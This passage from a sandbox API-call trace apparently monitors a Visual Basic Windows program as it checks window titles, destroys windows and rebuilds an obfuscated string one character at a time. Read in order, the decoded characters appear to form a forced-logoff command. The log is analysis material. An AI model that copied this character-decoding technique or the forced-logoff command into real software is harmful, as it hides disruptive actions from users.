lpMultiByteStr=0xe4a94c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0088.969] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0088.969] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0088.969] GetFocus () returned 0x0 [0088.969] lstrlenA (lpString="Act") returned 3 [0088.970] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0088.970] IsWindow (hWnd=0x2036e) returned 1 [0088.970] IsWindow (hWnd=0x2036e) returned 1 [0088.970] IsWindow (hWnd=0x2036e) returned 1 [0088.970] IsWindow (hWnd=0x2036e) returned 1 [0088.971] GetFocus () returned 0x0 [0088.971] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0088.971] GetFocus () returned 0x0 [0088.971] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0088.971] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0088.971] GetFocus () returned 0x0 [0088.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0088.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0088.972] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.972] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.973] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.973] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.974] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.974] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.975] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.975] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.976] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.976] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.977] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.977] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.977] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.978] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.978] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.979] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.979] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.979] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.980] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.980] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.981] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.981] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.982] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.982] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.992] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.993] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.993] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.993] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.994] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.994] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.995] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.995] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.995] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.996] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.996] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.996] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.997] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.997] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.998] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.999] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.999] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0089.000] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0089.000] GetForegroundWindow () returned 0x102c2 [0089.000] GetLastError () returned 0x0 [0089.000] SysStringLen (param_1=" ") returned 0xff [0089.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0089.000] SysStringLen (param_1=" ") returned 0xff [0089.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0089.001] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0089.001] GetLastError () returned 0x0 [0089.001] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0089.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0089.001] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0089.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0089.001] SysStringLen (param_1="Ac") returned 0x2 [0089.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0xe570fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0089.002] SetWindowTextA (hWnd=0x2036e, lpString="Ac") returned 1 [0089.002] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0089.002] GetFocus () returned 0x0 [0089.002] lstrlenA (lpString="Ac") returned 2 [0089.002] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe570fc) returned 0x1 [0089.002] IsWindow (hWnd=0x2036e) returned 1 [0089.002] IsWindow (hWnd=0x2036e) returned 1 [0089.003] IsWindow (hWnd=0x2036e) returned 1 [0089.003] IsWindow (hWnd=0x2036e) returned 1 [0089.003] GetFocus () returned 0x0 [0089.004] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0089.004] GetFocus () returned 0x0 [0089.004] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0089.004] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0089.004] GetFocus () returned 0x0 [0089.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0089.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0xe570fc, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0089.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0089.004] VarBstrCmp (bstrLeft="Ac", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0089.005] SetTimer (hWnd=0x20372, nIDEvent=0x20372, uElapse=0x64, lpTimerFunc=0x0) returned 0x20372 [0089.112] GetCapture () returned 0x0 [0089.112] ShowWindow (hWnd=0x70062, nCmdShow=0) returned 0 [0089.112] IsChild (hWndParent=0x60052, hWnd=0x50066) returned 0 [0089.112] GetWindow (hWnd=0x60052, uCmd=0x5) returned 0x0 [0089.112] GetFocus () returned 0x0 [0089.112] DestroyWindow (hWnd=0x60052) returned 1 [0089.112] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.113] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.113] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.114] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b2f0 | out: hHeap=0x30f0000) returned 1 [0089.114] IsChild (hWndParent=0x20372, hWnd=0x50066) returned 0 [0089.114] GetWindow (hWnd=0x20372, uCmd=0x5) returned 0x0 [0089.114] GetFocus () returned 0x0 [0089.114] DestroyWindow (hWnd=0x20372) returned 1 [0089.114] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.115] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.115] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.116] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b3d8 | out: hHeap=0x30f0000) returned 1 [0089.116] IsChild (hWndParent=0x50060, hWnd=0x50066) returned 0 [0089.116] GetWindow (hWnd=0x50060, uCmd=0x5) returned 0x0 [0089.116] GetFocus () returned 0x0 [0089.116] DestroyWindow (hWnd=0x50060) returned 1 [0089.116] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.117] GetFocus () returned 0x0 [0089.117] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.117] GetFocus () returned 0x0 [0089.117] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.117] GetFocus () returned 0x0 [0089.118] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.118] GetFocus () returned 0x0 [0089.118] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0089.118] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0089.118] GetFocus () returned 0x0 [0089.118] GetFocus () returned 0x0 [0089.118] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.119] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b5c0 | out: hHeap=0x30f0000) returned 1 [0089.119] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102938 | out: hHeap=0x30f0000) returned 1 [0089.119] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b4c0 | out: hHeap=0x30f0000) returned 1 [0089.119] IsChild (hWndParent=0x5005e, hWnd=0x50066) returned 0 [0089.119] GetWindow (hWnd=0x5005e, uCmd=0x5) returned 0x0 [0089.120] GetFocus () returned 0x0 [0089.120] DestroyWindow (hWnd=0x5005e) returned 1 [0089.120] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.120] GetFocus () returned 0x0 [0089.120] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.120] GetFocus () returned 0x0 [0089.120] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.121] GetFocus () returned 0x0 [0089.121] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.121] GetFocus () returned 0x0 [0089.121] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0089.121] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0089.121] GetFocus () returned 0x0 [0089.122] GetFocus () returned 0x0 [0089.122] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.122] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b6d0 | out: hHeap=0x30f0000) returned 1 [0089.122] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102978 | out: hHeap=0x30f0000) returned 1 [0089.123] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b5d0 | out: hHeap=0x30f0000) returned 1 [0089.123] IsChild (hWndParent=0x4013e, hWnd=0x50066) returned 0 [0089.124] GetWindow (hWnd=0x4013e, uCmd=0x5) returned 0x0 [0089.124] GetFocus () returned 0x0 [0089.124] DestroyWindow (hWnd=0x4013e) returned 1 [0089.124] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0089.124] GetFocus () returned 0x0 [0089.124] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0089.124] GetFocus () returned 0x0 [0089.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0089.125] GetFocus () returned 0x0 [0089.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x3e0a07cb [0089.125] GetFocus () returned 0x0 [0089.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0089.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0089.126] GetFocus () returned 0x0 [0089.126] GetFocus () returned 0x0 [0089.126] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0089.126] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, 